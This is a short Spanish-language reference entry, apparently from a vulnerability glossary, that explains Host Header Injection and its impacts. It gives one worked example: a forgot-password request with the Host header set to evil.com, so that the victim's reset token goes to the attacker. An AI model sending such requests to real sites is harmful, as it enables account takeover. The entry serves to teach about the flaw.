Host Header Injection
MedioHost Header Injection
Definición
Host Header Injection es una vulnerabilidad que ocurre cuando una aplicación confía ciegamente en el valor del encabezado Host de la petición HTTP. Un atacante puede manipular este encabezado para envenenar enlaces de restablecimiento de contraseña, manipular el enrutamiento, o envenenar cachés web.
Impacto
Envenenamiento de enlaces de restablecimiento de contraseñaEnvenenamiento de caché webBypass de controles de acceso basados en host virtualServer-Side Request Forgery internoRedirección a dominios maliciosos
Ejemplos
Password Reset Poisoning
La aplicación usa el encabezado Host para generar URLs absolutas en los emails de restablecimiento de contraseña. Al cambiarlo por el dominio del atacante, el enlace de reset apunta al servidor malicioso, capturando el token cuando la víctima hace clic.
# Petición de restablecimiento de contraseña con Host manipulado
POST /api/auth/forgot-password HTTP/1.1
Host: evil.com
Content-Type: application/json
{"email": "victima@ejemplo.com"}
# El servidor genera un enlace usando el Host header:
# https://evil.com/reset-password?token=abc123
# Este enlace se envía al email de la víctima
# Si la víctima hace clic, el token se envía al servidor del atacante